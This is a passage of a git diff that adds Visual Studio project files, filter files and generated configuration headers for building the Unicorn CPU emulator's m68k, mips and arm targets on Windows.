<Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\op_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\psci.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\translate.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\unicorn_arm.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/config-target.h new file mode 100644 index 0000000..8c27112 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/config-target.h @@ -0,0 +1,6 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_ARM 1 +#define TARGET_NAME "armeb" +#define TARGET_ARM 1 +#define TARGET_WORDS_BIGENDIAN 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/config-host.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/config-host.h new file mode 100644 index 0000000..15adc1d --- /dev/null +++ 
b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/config-host.h @@ -0,0 +1,6 @@ +/* Automatically generated by create_config - do not modify */ +#define HOST_I386 1 +#define CONFIG_WIN32 1 +#define CONFIG_FILEVERSION 2,2,1,0 +#define CONFIG_PRODUCTVERSION 2,2,1,0 +#define CONFIG_CPUID_H 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/config-target.h new file mode 100644 index 0000000..d0284a3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/config-target.h @@ -0,0 +1,6 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_M68K 1 +#define TARGET_NAME "m68k" +#define TARGET_M68K 1 +#define TARGET_WORDS_BIGENDIAN 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/m68k-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/m68k-softmmu.vcxproj new file mode 100644 index 0000000..1c7cee9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/m68k-softmmu.vcxproj @@ -0,0 +1,226 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude 
Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\target-m68k\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-m68k\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-m68k\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-m68k\m68k-qreg.h" /> + <ClInclude Include="..\..\..\qemu\target-m68k\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\m68k.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile 
Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\hw\m68k\dummy_m68k.c" /> + <ClCompile Include="..\..\..\qemu\target-m68k\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-m68k\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-m68k\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-m68k\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-m68k\unicorn.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{2C5AD347-6E34-463B-8289-00578E43B255}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>m68ksoftmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + 
<WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup 
Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-m68k;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>m68k.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-m68k;../../../include</AdditionalIncludeDirectories> + 
<AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>m68k.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-m68k;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>m68k.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + 
<PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-m68k;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>m68k.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/m68k-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/m68k-softmmu.vcxproj.filters new file mode 100644 index 0000000..f348710 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/m68k-softmmu.vcxproj.filters @@ -0,0 +1,110 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{45b613c4-9fdb-482c-b94f-0138ea9907c3}</UniqueIdentifier> + </Filter> + <Filter 
Include="hw"> + <UniqueIdentifier>{14f99bfc-becf-403c-9100-1612ab30a848}</UniqueIdentifier> + </Filter> + <Filter Include="hw\m68k"> + <UniqueIdentifier>{484590c4-abd5-4db4-8b06-b34087856c27}</UniqueIdentifier> + </Filter> + <Filter Include="target-m68k"> + <UniqueIdentifier>{476366de-d432-4ce4-8e04-64aa34326aa0}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{63d2e327-f759-4757-a44b-90513ce433f7}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{574ebec7-47db-49de-8f59-3365337e42a7}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-m68k\cpu.h"> + <Filter>target-m68k</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-m68k\cpu-qom.h"> + <Filter>target-m68k</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-m68k\helper.h"> + <Filter>target-m68k</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-m68k\m68k-qreg.h"> + <Filter>target-m68k</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-m68k\unicorn.h"> + <Filter>target-m68k</Filter> + </ClInclude> + 
<ClInclude Include="..\..\..\qemu\m68k.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\hw\m68k\dummy_m68k.c"> + <Filter>hw\m68k</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-m68k\cpu.c"> + <Filter>target-m68k</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-m68k\helper.c"> + <Filter>target-m68k</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-m68k\op_helper.c"> + <Filter>target-m68k</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-m68k\translate.c"> + <Filter>target-m68k</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-m68k\unicorn.c"> + <Filter>target-m68k</Filter> + </ClCompile> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/config-target.h new file mode 100644 index 0000000..85a5f1b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/config-target.h @@ -0,0 +1,7 @@ +/* Automatically generated by 
create_config - do not modify */ +#define TARGET_ABI_MIPSO32 1 +#define TARGET_MIPS 1 +#define TARGET_NAME "mips" +#define TARGET_MIPS 1 +#define TARGET_WORDS_BIGENDIAN 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/mips-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/mips-softmmu.vcxproj new file mode 100644 index 0000000..0cc7b08 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/mips-softmmu.vcxproj @@ -0,0 +1,237 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\mips-defs.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude 
Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\mips.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\addr.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\cputimer.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\mips_r4k.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\dsp_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\lmi_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\msa_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\translate_init.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\unicorn.c" /> + <ClCompile 
Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{63050112-E486-4396-B5E4-303C3BC12D39}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>mipssoftmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup 
Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup 